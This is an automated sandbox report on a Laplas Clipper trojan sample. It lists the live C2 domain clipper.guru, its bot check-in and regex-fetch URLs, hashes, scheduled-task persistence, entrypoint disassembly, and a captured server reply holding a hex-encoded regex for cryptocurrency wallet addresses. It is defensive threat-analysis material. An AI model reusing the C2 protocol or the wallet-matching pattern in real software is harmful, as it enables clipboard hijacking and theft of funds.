http://clipper.guru/bot/regex?key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdbjo	100%	Avira URL Cloud	phishing
http://clipper.guru/bot/online?guid=computer	100%	Avira URL Cloud	phishing
http://clipper.guru/bot/regex?key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
clipper.guru	45.159.189.115	true	true	13%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://clipper.guru/bot/online?guid=computer\user&key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb	true		unknown
http://clipper.guru/bot/regex?key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://clipper.guru/bot/regex?key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdbjo	PNcznLwIMl.exe, 00000006.00000002.643181685.000000001388A000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://clipper.guru/bot/online?guid=computer	PNcznLwIMl.exe, 00000006.00000002.643112091.0000000013882000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.159.189.115	clipper.guru	Netherlands		14576	HOSTING-SOLUTIONSUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	754720
Start date and time:	2022-11-27 18:18:56 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Ao88ZLN0Wi.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spyw.evad.winEXE@7/3@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 15% (good quality ratio 7.2%) Quality average: 40.1% Quality standard deviation: 44.2%
HCA Information:	Successful, ratio: 75% Number of executed functions: 4 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.

Simulations

Behavior and APIs

Time	Type	Description
18:21:32	Task Scheduler	Run new task: jicTFBavsm path: C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.159.189.115	file.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=computer\user&key=b208717c54146010ab89e628591e2a7b11493ef1c593e7b3f15b1c06b1778d59
	file.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=computer\user&key=c25400a81a220bbbc3cb779c59ab8b74c7b58ae3a99f465520cbd86c53bd630b
	Cr9uO9VBlT.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=computer\user&key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb
	yd8MFQKZ4r.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=830021&key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb
	SecuriteInfo.com.Win32.Evo-gen.7929.31167.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=computer\user&key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb
	SecuriteInfo.com.Trojan.MulDrop21.15342.27938.8060.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=760639&key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb
	5d9VUNkH4r.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=computer\user&key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb
	mRVT7FX80o.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=965969&key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb
	FaixLauncher.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=813848&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e
	file.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=computer\user&key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb
	MHn7Q4Vevx.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=computer\user&key=d3bce09c5961a898f079f77978bcaecea30c9172b520f467e4faa82cf9ab7ef4
	pftqpIuksj.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=216041&key=e436f74752b159beed7d57463233f82d10a9fb53e0b4073a5bf717e49935f5b1
	BeHCNKrWiv.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=675052&key=922262f43f9d6be84c4edf69b6a18ee29820b34ba470a762eb44e1c34a6bde86
	FxESj1OLhA.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=f21073add21558dbf805f2d7f01a9192d88f14e6896a394396e1cd41f3a1c26b
	file.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef
	EITTchZe9T.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=f21073add21558dbf805f2d7f01a9192d88f14e6896a394396e1cd41f3a1c26b
	EyaF5g2eH3.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=f21073add21558dbf805f2d7f01a9192d88f14e6896a394396e1cd41f3a1c26b
	fSZ7xQV0PA.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=f21073add21558dbf805f2d7f01a9192d88f14e6896a394396e1cd41f3a1c26b
	NON0aFFM3X.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=f21073add21558dbf805f2d7f01a9192d88f14e6896a394396e1cd41f3a1c26b
	file.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
clipper.guru	file.exe	Get hash	malicious	Browse	45.159.189.115
	file.exe	Get hash	malicious	Browse	45.159.189.115
	file.exe	Get hash	malicious	Browse	45.159.189.115
	Cr9uO9VBlT.exe	Get hash	malicious	Browse	45.159.189.115
	yd8MFQKZ4r.exe	Get hash	malicious	Browse	45.159.189.115
	SecuriteInfo.com.Win32.Evo-gen.7929.31167.exe	Get hash	malicious	Browse	45.159.189.115
	SecuriteInfo.com.Trojan.MulDrop21.15342.27938.8060.exe	Get hash	malicious	Browse	45.159.189.115
	5d9VUNkH4r.exe	Get hash	malicious	Browse	45.159.189.115
	mRVT7FX80o.exe	Get hash	malicious	Browse	45.159.189.115
	FaixLauncher.exe	Get hash	malicious	Browse	45.159.189.115
	file.exe	Get hash	malicious	Browse	45.159.189.115
	MHn7Q4Vevx.exe	Get hash	malicious	Browse	45.159.189.115
	vbEnywq7Bf.exe	Get hash	malicious	Browse	45.159.189.115
	file.exe	Get hash	malicious	Browse	45.159.189.115
	Order_007136.exe	Get hash	malicious	Browse	45.159.189.115
	PI_007136.xlsm	Get hash	malicious	Browse	45.159.189.115
	IMG-065-784-5103.exe	Get hash	malicious	Browse	45.159.189.115
	pftqpIuksj.exe	Get hash	malicious	Browse	45.159.189.115
	BeHCNKrWiv.exe	Get hash	malicious	Browse	45.159.189.115
	FxESj1OLhA.exe	Get hash	malicious	Browse	45.159.189.115

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTING-SOLUTIONSUS	SU7pJdqsuD.exe	Get hash	malicious	Browse	185.223.93.251
	file.exe	Get hash	malicious	Browse	45.159.189.115
	file.exe	Get hash	malicious	Browse	185.223.93.251
	file.exe	Get hash	malicious	Browse	45.159.189.115
	Cr9uO9VBlT.exe	Get hash	malicious	Browse	45.159.189.115
	yd8MFQKZ4r.exe	Get hash	malicious	Browse	45.159.189.115
	SecuriteInfo.com.Win32.Evo-gen.7929.31167.exe	Get hash	malicious	Browse	45.159.189.115
	SecuriteInfo.com.Trojan.MulDrop21.15342.27938.8060.exe	Get hash	malicious	Browse	45.159.189.115
	5d9VUNkH4r.exe	Get hash	malicious	Browse	45.159.189.115
	mRVT7FX80o.exe	Get hash	malicious	Browse	45.159.189.115
	FaixLauncher.exe	Get hash	malicious	Browse	45.159.189.115
	9LsA5PD9CW.exe	Get hash	malicious	Browse	185.223.93.253
	file.exe	Get hash	malicious	Browse	45.159.189.115
	MHn7Q4Vevx.exe	Get hash	malicious	Browse	45.159.189.115
	AFE2LBGd22.exe	Get hash	malicious	Browse	185.223.93.251
	pftqpIuksj.exe	Get hash	malicious	Browse	45.159.189.115
	BeHCNKrWiv.exe	Get hash	malicious	Browse	45.159.189.115
	FxESj1OLhA.exe	Get hash	malicious	Browse	45.159.189.115
	file.exe	Get hash	malicious	Browse	45.159.189.115
	file.exe	Get hash	malicious	Browse	45.159.189.115

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe

Download File

Process:	C:\Users\user\Desktop\Ao88ZLN0Wi.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	774832757
Entropy (8bit):	7.99999948335202
Encrypted:	true
SSDEEP:
MD5:	6CE4DAC5A778F8E717E5C9C1222AE0DF
SHA1:	78A241368DB6DE9123703900FD5499E340E6B086
SHA-256:	F88DFE5CF742D3DE8999BF1326EA9F718ACE6371FCEEB828350AC85C65AF9EA0
SHA-512:	6EADC6E66A1B49F7829BF5D2E0E24E40F563F87F1DFB3F41B89A1237C4E97019457E671A9D4B22671B6C6E550C23633FFF657A7EE505E54A4138D8BFC52480C1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.+...x...x...x.J;x...x.W8x...x.W.x...x...x...x...x5..x.W)x...x.W9x...x.W<x...xRich...x................PE..L......`............................wC....... ....@..........................p........#.........................................P....0...3...........................................................(..@...............<............................text............................... ..`.data........ ....".................@....rsrc....3...0...4....#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Mup\computer\PIPE\samr

Download File

Process:	C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.053374040827532
Encrypted:	false
SSDEEP:	3:rmHD/tH//lllLGlA1yqGlgZty:rmH2oty
MD5:	080E701E8B8E2E9C68203C150AC7C6B7
SHA1:	4EF041621388B805758AE1D3B122F9D364705223
SHA-256:	FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D
SHA-512:	C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719D892B4C0D22BB67BE0D57EAB368BA1BC057E79
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........t.......................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......,..l..@E............

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\schtasks.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	73
Entropy (8bit):	4.559200415871013
Encrypted:	false
SSDEEP:	3:BgnKDOheMmgDUWsKAK89AAAXb:BgnKqhquP8K89o
MD5:	B811CB5DB5B2D2DAE21D673D3DF58A90
SHA1:	91D661C8B60FD14A287183715AA03DD30200B26E
SHA-256:	2F90070AC4E055F795B7756E3005C2B26BB288CD14AC4FF6ADFD48F1B2BCDE86
SHA-512:	2F6FC6D8CF96AB83B802D613A6191628618961A789284112712F66A0B153738F4D0BE6A0AFD5DDBB444A1BE4300842559C6A1A68F3FA5690052FA52EBB837B8D
Malicious:	false
Preview:	SUCCESS: The scheduled task "jicTFBavsm" has successfully been created...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.984281039322701
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Ao88ZLN0Wi.exe
File size:	2311168
MD5:	24774c7b900e0a51df665776b502cfc9
SHA1:	220db17c0ba6b83ead730bf65c6e34d4da4eadaa
SHA256:	81e9eefec051e50a819e76fa1ec2f088c2e8c5de677537838193cf6c2e5c7584
SHA512:	ea7c38cbc7611d53a8f79243a7031939e18ea841d4c6a22ebbc4773292ee6f8fb174ac5a1d4be8bb6c343e528ecc1f49bed0c8ea6fb7271ff3941e84c58d668c
SSDEEP:	49152:D52VUM+pj0i6fodAXT49NxSUIBdxorsSaiMLy5pb504BRdT4Hol7UR:l2VjsEwdqTgXSUIVIR7Rq4BbsHol7
TLSH:	83B5339B7293E076D823C8761C39D2056F9B3578A6287E1CFB1079361F206F9EE57242
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.+...x...x...x.J;x...x.W8x...x.W.x...x...x...x...x5..x.W)x...x.W9x...x.W<x...xRich...x................PE..L......`...........

File Icon


Icon Hash:	c8d0d8e0f8e0f0e8

Static PE Info

General

Entrypoint:	0x404377
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x60E1C6D5 [Sun Jul 4 14:33:57 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	77b9cbeda5e32323ee560d94649c1c1a

Entrypoint Preview

Instruction
call 00007F2F2C700F52h
jmp 00007F2F2C6FBB3Dh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F2F2C6FBCCAh
cmp edi, eax
jc 00007F2F2C6FBE6Ah
cmp ecx, 00000100h
jc 00007F2F2C6FBCE1h
cmp dword ptr [00CE20BCh], 00000000h
je 00007F2F2C6FBCD8h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007F2F2C6FBCCAh
pop esi
pop edi
pop ebp
jmp 00007F2F2C701014h
test edi, 00000003h
jne 00007F2F2C6FBCD7h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007F2F2C6FBCECh
rep movsd
jmp dword ptr [00404504h+edx*4]
nop
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007F2F2C6FBCCEh
and eax, 03h
add ecx, eax
jmp dword ptr [00404418h+eax*4]
jmp dword ptr [00404514h+ecx*4]
nop
jmp dword ptr [00404498h+ecx*4]
nop
sub byte ptr [eax+eax*2+00h], al
push esp
inc esp
inc eax
add byte ptr [eax+44h], bh
inc eax
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007F2F2EB744C7h
add esi, 00000000h

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x107dc	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8e3000	0x33f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1280	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2810	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x23c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x104f0	0x10600	False	0.5105110925572519	data	6.103711544667787	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x12000	0x8d00c4	0x220600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x8e3000	0x33f0	0x3400	False	0.6714242788461539	data	5.978161453913827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
KADI	0x8e5d68	0x4a3	ASCII text, with very long lines (1187), with no line terminators	Raeto-Romance	Switzerland
RT_ICON	0x8e3250	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Raeto-Romance	Switzerland
RT_ICON	0x8e3918	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Raeto-Romance	Switzerland
RT_ICON	0x8e3e80	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Raeto-Romance	Switzerland
RT_ICON	0x8e4f28	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Raeto-Romance	Switzerland
RT_ICON	0x8e58b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Raeto-Romance	Switzerland
RT_ACCELERATOR	0x8e6210	0x98	data	Raeto-Romance	Switzerland
RT_GROUP_ICON	0x8e5d18	0x4c	data	Raeto-Romance	Switzerland
RT_VERSION	0x8e62a8	0x148	x86 executable not stripped

Imports

DLL	Import
KERNEL32.dll	EnumSystemCodePagesA, EnumDateFormatsW, OpenMutexA, GetConsoleAliasExesLengthW, CopyFileExW, ReadConsoleOutputCharacterA, GetEnvironmentStrings, GetCommConfig, QueryDosDeviceA, EnumCalendarInfoExA, SetProcessPriorityBoost, CreateJobSet, AddConsoleAliasW, CreateFileA, GetMailslotInfo, GetWindowsDirectoryA, GetModuleHandleA, GlobalHandle, CreateDirectoryExA, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, OpenWaitableTimerA, GetVersionExW, SearchPathA, RequestWakeupLatency, CallNamedPipeA, GetCurrentDirectoryW, GetDriveTypeW, CreateMailslotW, BuildCommDCBAndTimeoutsW, GetProcAddress, LoadLibraryA, LocalAlloc, MoveFileWithProgressW, GetBinaryTypeA, TerminateThread, WriteConsoleOutputA, GetCommandLineW, GetVolumeInformationA, VerifyVersionInfoA, DeleteTimerQueue, SearchPathW, CopyFileW, GetHandleInformation, FindResourceA, CreateJobObjectW, FindFirstVolumeW, GlobalFlags, CreateNamedPipeW, WritePrivateProfileStringW, InterlockedDecrement, GetModuleHandleW, GetTickCount, VerSetConditionMask, WriteTapemark, GetTapeParameters, HeapLock, GetConsoleTitleW, InterlockedExchangeAdd, EnumCalendarInfoA, InterlockedExchange, GetNamedPipeHandleStateA, TerminateProcess, MoveFileA, AddAtomW, UnregisterWait, FreeEnvironmentStringsW, SetConsoleTitleA, SetVolumeMountPointW, VirtualProtect, _hread, ClearCommBreak, GlobalFindAtomA, CloseHandle, FindFirstChangeNotificationA, LoadLibraryW, GetLastError, HeapFree, HeapAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, DeleteFileA, GetCommandLineA, GetStartupInfoA, GetCurrentProcess, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, GetFileType, FreeEnvironmentStringsA, WideCharToMultiByte, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, SetFilePointer, GetConsoleCP, GetConsoleMode, MultiByteToWideChar, HeapSize, GetLocaleInfoA, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, ReadFile
USER32.dll	GetComboBoxInfo, CharUpperBuffA, GetMenuInfo
GDI32.dll	GetCharABCWidthsA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Raeto-Romance	Switzerland

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.445.159.189.11549685802039775 11/27/22-18:21:56.410768	TCP	2039775	ET TROJAN Laplas Clipper - Regex CnC Request	49685	80	192.168.2.4	45.159.189.115
192.168.2.48.8.8.862577532039774 11/27/22-18:21:56.327003	UDP	2039774	ET TROJAN Laplas Clipper CnC Domain (clipper .guru) in DNS Lookup	62577	53	192.168.2.4	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2022 18:21:56.362102985 CET	49685	80	192.168.2.4	45.159.189.115
Nov 27, 2022 18:21:56.391436100 CET	80	49685	45.159.189.115	192.168.2.4
Nov 27, 2022 18:21:56.391727924 CET	49685	80	192.168.2.4	45.159.189.115
Nov 27, 2022 18:21:56.410768032 CET	49685	80	192.168.2.4	45.159.189.115
Nov 27, 2022 18:21:56.440361977 CET	80	49685	45.159.189.115	192.168.2.4
Nov 27, 2022 18:21:56.445704937 CET	80	49685	45.159.189.115	192.168.2.4
Nov 27, 2022 18:21:56.586589098 CET	49685	80	192.168.2.4	45.159.189.115
Nov 27, 2022 18:21:57.549923897 CET	49685	80	192.168.2.4	45.159.189.115
Nov 27, 2022 18:21:57.584654093 CET	80	49685	45.159.189.115	192.168.2.4
Nov 27, 2022 18:21:57.686286926 CET	49685	80	192.168.2.4	45.159.189.115
Nov 27, 2022 18:22:27.682094097 CET	49685	80	192.168.2.4	45.159.189.115
Nov 27, 2022 18:22:27.711343050 CET	80	49685	45.159.189.115	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2022 18:21:56.327003002 CET	62577	53	192.168.2.4	8.8.8.8
Nov 27, 2022 18:21:56.346370935 CET	53	62577	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 27, 2022 18:21:56.327003002 CET	192.168.2.4	8.8.8.8	0x9b7	Standard query (0)	clipper.guru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 27, 2022 18:21:56.346370935 CET	8.8.8.8	192.168.2.4	0x9b7	No error (0)	clipper.guru		45.159.189.115	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

clipper.guru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49685	45.159.189.115	80	C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe

Timestamp	kBytes transferred	Direction	Data
Nov 27, 2022 18:21:56.410768032 CET	92	OUT	GET /bot/regex?key=ace492e9661223449782fcc8096dc6ef6289032d08d03a7b0a92179622c35bdb HTTP/1.1 Host: clipper.guru User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Nov 27, 2022 18:21:56.445704937 CET	93	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 27 Nov 2022 17:21:56 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 709 Connection: keep-alive Data Raw: 5e 28 3f 3a 28 31 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 33 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 62 63 31 71 5b 30 32 33 34 35 36 37 38 39 61 63 64 65 66 67 68 6a 6b 6c 6d 6e 70 71 72 73 74 75 76 77 78 79 7a 5d 7b 33 38 2c 35 38 7d 29 7c 28 71 5b 61 2d 7a 30 2d 39 5d 7b 34 31 7d 29 7c 28 70 5b 61 2d 7a 30 2d 39 5d 7b 34 31 7d 29 7c 28 4c 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 33 33 7d 29 7c 28 4d 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 33 33 7d 29 7c 28 6c 74 63 31 71 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 33 38 7d 29 7c 28 30 78 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 29 7c 28 44 5b 35 2d 39 41 2d 48 4a 2d 4e 50 2d 55 5d 7b 31 7d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 32 7d 29 7c 28 34 5b 30 2d 39 41 42 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 39 33 7d 29 7c 28 38 5b 30 2d 39 41 42 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 39 33 7d 29 7c 28 72 5b 30 2d 39 61 2d 7a 41 2d 5a 5d 7b 33 33 7d 29 7c 28 74 31 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 33 33 7d 29 7c 28 58 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 72 6f 6e 69 6e 3a 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 29 7c 28 54 5b 41 2d 5a 61 2d 7a 31 2d 39 5d 7b 33 33 7d 29 7c 28 68 74 74 70 5b 73 5d 2a 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 74 72 61 64 65 6f 66 66 65 72 5c 2f 6e 65 77 5c 2f 5c 3f 70 61 72 74 6e 65 72 3d 28 5b 30 2d 39 5d 2b 29 26 74 6f 6b 65 6e 3d 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 2b 29 29 7c 28 74 7a 5b 31 2d 33 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 61 64 64 72 31 5b 61 2d 7a 30 2d 39 5d 2b 29 7c 28 63 6f 73 6d 6f 73 31 5b 61 2d 7a 30 2d 39 5d 7b 33 38 7d 29 7c 28 52 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 7b 33 33 7d 29 7c 28 5b 41 2d 5a 32 2d 37 5d 7b 35 38 7d 29 7c 28 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 34 34 7d 29 29 24 Data Ascii: 